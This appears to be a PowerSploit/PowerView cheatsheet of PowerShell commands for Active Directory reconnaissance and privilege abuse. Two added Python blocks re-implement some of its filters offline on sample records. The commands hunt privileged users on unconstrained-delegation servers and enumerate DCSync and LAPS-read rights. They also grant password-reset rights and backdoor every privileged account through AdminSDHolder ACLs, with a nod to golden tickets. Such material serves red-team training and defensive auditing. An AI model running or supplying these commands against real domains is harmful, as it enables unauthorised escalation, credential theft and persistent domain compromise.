Powersploit cheatsheet

PowerView

Get all the groups a user is effectively a member of, 'recursing up':

Get-NetGroup -UserName <USER>

Get all the effective members of a group, 'recursing down':

Get-NetGroupMember -GroupName <GROUP> -Recurse

Get the effective set of users who can administer a server:

Get-NetLocalGroup -Recurse SERVER.domain.local

Retrieve all the computers a GPP password applies to:

Get-NetOU -GUID <GPP_GUID> | %{ Get-NetComputer -ADSPath $_ }

Get all users with passwords changed > 1 year ago:

$Date = (Get-Date).AddYears(-1).ToFileTime()
Get-NetUser -Filter "(pwdlastset<=$Date)"

All enabled users:

Get-NetUser -Filter "(!userAccountControl:1.2.840.113556.1.4.803:=2)"

All disabled users:

Get-NetUser -Filter "(userAccountControl:1.2.840.113556.1.4.803:=2)"

All users that require smart card authentication:

Get-NetUser -Filter "(useraccountcontrol:1.2.840.113556.1.4.803:=262144)"

All users that don't require smart card authentication:

Get-NetUser -Filter "(!useraccountcontrol:1.2.840.113556.1.4.803:=262144)"
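As an added example (not PowerView code and not from the original cheatsheet), the following Python reproduces what the five filters above actually evaluate: the FILETIME arithmetic behind `(Get-Date).AddYears(-1).ToFileTime()` and the bit-AND matching rule behind `1.2.840.113556.1.4.803`, applied to constructed user records so the classification can be checked offline. The record field names and sample values are assumptions.

```python
import datetime as dt
# Added example, not PowerView code: what the page's Get-NetUser filters compute.
UTC = dt.timezone.utc
EPOCH_1601 = dt.datetime(1601, 1, 1, tzinfo=UTC)
ACCOUNTDISABLE = 2           # userAccountControl bits from the page's filters
SMARTCARD_REQUIRED = 262144

def to_filetime(when):
    """Windows FILETIME: 100-ns ticks since 1601-01-01 UTC, what (Get-Date).ToFileTime()
    returns and pwdLastSet stores. Integer math keeps the ~1e17 tick values exact."""
    d = when - EPOCH_1601
    return (d.days * 86400 + d.seconds) * 10_000_000 + d.microseconds * 10

def years_ago(now, years):
    """Mirror .NET AddYears(-n): 29 Feb clamps to 28 Feb in the target year."""
    try:
        return now.replace(year=now.year - years)
    except ValueError:
        return now.replace(year=now.year - years, day=28)

def bit_and_match(value, mask):
    """LDAP_MATCHING_RULE_BIT_AND (OID 1.2.840.113556.1.4.803): true only if
    every bit of mask is set in value; '!' in the page's filters negates it."""
    return (value & mask) == mask

def audit_users(users, now):
    """Classify records as the page's five filters do. Caveat: pwdLastSet=0
    ('must change password at next logon') also satisfies (pwdlastset<=$Date)."""
    cutoff = to_filetime(years_ago(now, 1))
    r = {"enabled": [], "disabled": [], "smartcard": [],
         "no_smartcard": [], "stale_password": []}
    for u in users:
        name, uac = u["sAMAccountName"], u["userAccountControl"]
        r["disabled" if bit_and_match(uac, ACCOUNTDISABLE) else "enabled"].append(name)
        r["smartcard" if bit_and_match(uac, SMARTCARD_REQUIRED) else "no_smartcard"].append(name)
        if u["pwdLastSet"] <= cutoff:
            r["stale_password"].append(name)
    return r
# Constructed sample records (not from a real directory); 512 = NORMAL_ACCOUNT.
NOW = dt.datetime(2024, 6, 1, tzinfo=UTC)
def _user(name, uac, days_since_pw_change):
    pw = 0 if days_since_pw_change is None else to_filetime(NOW - dt.timedelta(days=days_since_pw_change))
    return {"sAMAccountName": name, "userAccountControl": uac, "pwdLastSet": pw}
SAMPLE_USERS = [
    _user("alice", 512, 30),
    _user("bob", 512 | ACCOUNTDISABLE, 400),
    _user("carol", 512 | SMARTCARD_REQUIRED, 10),
    _user("dave", 512, None),   # never set / must change at next logon
]
```

Running `audit_users(SAMPLE_USERS, NOW)` lists dave under stale passwords even though his password is simply unset, which is the same over-match the `(pwdlastset<=$Date)` filter produces in a real directory.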

Enumerate all servers that allow unconstrained delegation, and all users that aren't marked as sensitive/not for delegation:

$Computers = Get-NetComputer -Unconstrained
$Users = Get-NetUser -AllowDelegation -AdminCount

Enumerate servers that allow unconstrained kerberos delegation and show all users logged in:

Invoke-UserHunter -Unconstrained -ShowAll

Hunt for admin users that allow delegation, logged into servers that allow unconstrained delegation:

Invoke-UserHunter -Unconstrained -AdminCount -AllowDelegation

Get the logged on users for all machines in any server OU in a particular domain:

Get-NetOU *server* -Domain <domain> | %{Get-NetComputer -ADSPath $_ | %{Get-NetLoggedOn -ComputerName $_}}

Find all users with an SPN set (likely service accounts):

Get-NetUser -SPN

Find all service accounts in "Domain Admins":

Get-NetUser -SPN | ?{$_.memberof -match 'Domain Admins'}

Hunt for all privileged users (adminCount=1):

Invoke-UserHunter -AdminCount

Find users with sidHistory set:

Get-NetUser -Filter '(sidHistory=*)'

Enumerate all global catalogs in the forest:

Get-NetForestCatalog

Turn a list of computer short names into FQDNs:

gc computers.txt | % {Get-NetComputer -ADSpath "GC://GLOBAL.CATALOG" -Filter "(name=$_)"}

Find interesting .vbs/.bat/.ps1 scripts on domain controllers:

Invoke-FileFinder -SearchSYSVol

Enumerate the current domain policy, optionally specifying a domain to query for or a DC to reflect queries through:

$DomainPolicy = Get-DomainPolicy [-Domain <DOMAIN>] [-DomainController <DC>]
$DomainPolicy.KerberosPolicy # useful for golden tickets ;)
$DomainPolicy.SystemAccess

Enumerate the current domain controller policy, resolving SIDs to account names, and seeing who has what rights on DCs by default:

$DcPolicy = Get-DomainPolicy -Source DC -ResolveSids
$DcPolicy.PrivilegeRights

Enumerate the machines that a particular group has local admin rights to:

Find-GPOLocation -GroupName <GROUP>

Enumerate the machines that a given user in the specified domain has RDP access rights to, reflecting queries through a particular DC:

Find-GPOLocation -UserName <USER> -Domain <DOMAIN> -DomainController <DC> -LocalGroup RDP

Export a csv of all GPO mappings:

Find-GPOLocation | %{$_.computers = $_.computers -join ", "; $_} | Export-CSV -NoTypeInformation gpo_map.csv

Use alternate credentials for searching for files on the domain:

$Password = "PASSWORD" | ConvertTo-SecureString -AsPlainText -Force
$Credential = New-Object System.Management.Automation.PSCredential("DOMAIN\user",$Password)
Invoke-FileFinder -Domain DOMAIN -Credential $Credential

Enumerate who has rights to the 'matt' user in 'testlab.local', resolving rights GUIDs to names:

Get-ObjectAcl -SamAccountName matt -Domain testlab.local -ResolveGUIDs

Grant user 'will' the rights to change 'matt's password:

Add-ObjectAcl -TargetSamAccountName matt -PrincipalSamAccountName will -Rights ResetPassword

Audit the permissions of AdminSDHolder, resolving GUIDs:

Get-ObjectACL -ADSPrefix 'CN=AdminSDHolder,CN=System' -ResolveGUIDs

Backdoor the ACLs of all privileged accounts with the 'matt' account through AdminSDHolder abuse:

Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName matt -Rights All

Retrieve most users who can perform DC replication for dev.testlab.local (i.e. DCSync):

Get-ObjectACL -DistinguishedName "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? {
    ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')
}

Find linked DA accounts using name correlation:

Get-NetGroupMember -GroupName "Domain Admins" | %{ Get-NetUser $_.membername } | %{ $a=$_.displayname.split(" ")[0..1] -join " "; Get-NetUser -Filter "(displayname=*$a*)" } | Select-Object -Property displayname,samaccountname

Save a PowerView object to disk for later usage:

Get-NetUser | Export-Clixml user.out
$Users = Import-Clixml user.out

Find any machine accounts in privileged groups:

Get-NetGroup -AdminCount | Get-NetGroupMember -Recurse | ?{$_.MemberName -like '*$'}

Enumerate permissions for GPOs where users have some kind of modify rights:

Get-NetGPO | Get-ObjectAcl -ResolveGUIDs | Where-Object {($_.ObjectType -eq 'All') -and ($_.ActiveDirectoryRights -match "GenericAll|GenericWrite|WriteProperty|CreateChild" )}

Find all policies applied to a given machine:

Get-NetGPO -ComputerName WINDOWS1.testlab.local

Find the user/groups that have read access to the LAPS password property for a specified computer:

Get-NetComputer -ComputerName 'LAPSCLIENT.test.local' -FullData |
    Select-Object -ExpandProperty distinguishedname |
    ForEach-Object { $_.substring($_.indexof('OU')) } | ForEach-Object {
        Get-ObjectAcl -ResolveGUIDs -DistinguishedName $_
    } | Where-Object {
        ($_.ObjectType -like 'ms-Mcs-AdmPwd') -and
        ($_.ActiveDirectoryRights -match 'ReadProperty')
    } | ForEach-Object {
        Convert-NameToSid $_.IdentityReference
    } | Select-Object -ExpandProperty SID | Get-ADObject

Get the ACLs for all OUs where someone is allowed to read the LAPS password attribute:

Get-NetOU -FullData | 
    Get-ObjectAcl -ResolveGUIDs | 
    Where-Object {
        ($_.ObjectType -like 'ms-Mcs-AdmPwd') -and 
        ($_.ActiveDirectoryRights -match 'ReadProperty')
    } | ForEach-Object {
        $_ | Add-Member NoteProperty 'IdentitySID' $(Convert-NameToSid $_.IdentityReference).SID;
        $_
    }

Perform a user 'zone transfer' by exporting all AD DNS records from all zones, writing them to a .csv:

Get-DNSZone | Get-DNSRecord | Export-CSV -NoTypeInformation dns.csv

Return all universal security groups in a forest with foreign members:

Get-NetGroup -Filter '(member=*)(groupType=2147483656)' -ADSPath 'GC://testlab.local' -FullData | Select-Object samaccountname,distinguishedname,member | ForEach-Object {
    $GroupDomain = $_.distinguishedname.subString($_.distinguishedname.IndexOf("DC="))
    $_.Member = $_.Member | ForEach-Object {
        $MemberDomain = $_.subString($_.IndexOf("DC="))
        if($GroupDomain -ne $MemberDomain) {
            $_
        }
    }
    $_
} | Where-Object {$_.Member}
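As an added example (not PowerView's code and not from the original cheatsheet), the following Python reproduces the foreign-member logic of the command above with a real RDN split, so values containing escaped commas and mixed-case DNs compare correctly, and spells out what the `2147483656` groupType value encodes. The group records are constructed and their field names are assumptions.

```python
# Added example, not PowerView code: the foreign-member check from the last command
# above, with a proper RDN split instead of IndexOf("DC=") and groupType decoded.
UNIVERSAL_SECURITY = 0x80000008  # 2147483656 = universal (0x8) | security-enabled (0x80000000)
def split_rdns(dn):
    """Split a DN on unescaped commas; an escaped '\\,' stays inside its value."""
    parts, cur, esc = [], [], False
    for ch in dn:
        if esc:
            cur.append(ch); esc = False
        elif ch == "\\":
            cur.append(ch); esc = True
        elif ch == ",":
            parts.append("".join(cur).strip()); cur = []
        else:
            cur.append(ch)
    parts.append("".join(cur).strip())
    return parts

def domain_of(dn):
    """Trailing run of DC= components, lower-cased (DNs compare case-insensitively)."""
    dcs = []
    for rdn in reversed(split_rdns(dn)):
        if not rdn.lower().startswith("dc="):
            break
        dcs.append(rdn.lower())
    return ",".join(reversed(dcs))

def foreign_members(groups):
    """{group DN: members from another domain}, universal security groups only."""
    out = {}
    for g in groups:
        if g["groupType"] != UNIVERSAL_SECURITY:   # mirrors (groupType=2147483656)
            continue
        home = domain_of(g["distinguishedName"])
        foreign = [m for m in g["member"] if domain_of(m) != home]
        if foreign:
            out[g["distinguishedName"]] = foreign
    return out
# Constructed sample groups (not from a real forest).
SAMPLE_GROUPS = [
    {"distinguishedName": "CN=Forest Ops,CN=Users,DC=testlab,DC=local",
     "groupType": UNIVERSAL_SECURITY,
     "member": ["CN=alice,CN=Users,DC=testlab,DC=local",
                "CN=bob,OU=Admins,DC=dev,DC=testlab,DC=local",
                "CN=Smith\\, Carol,OU=Staff,DC=TESTLAB,DC=LOCAL"]},  # escaped comma, odd case
    {"distinguishedName": "CN=Dev Only,CN=Users,DC=dev,DC=testlab,DC=local",
     "groupType": 0x80000002,  # global security group: outside the page's filter
     "member": ["CN=alice,CN=Users,DC=testlab,DC=local"]},
]
```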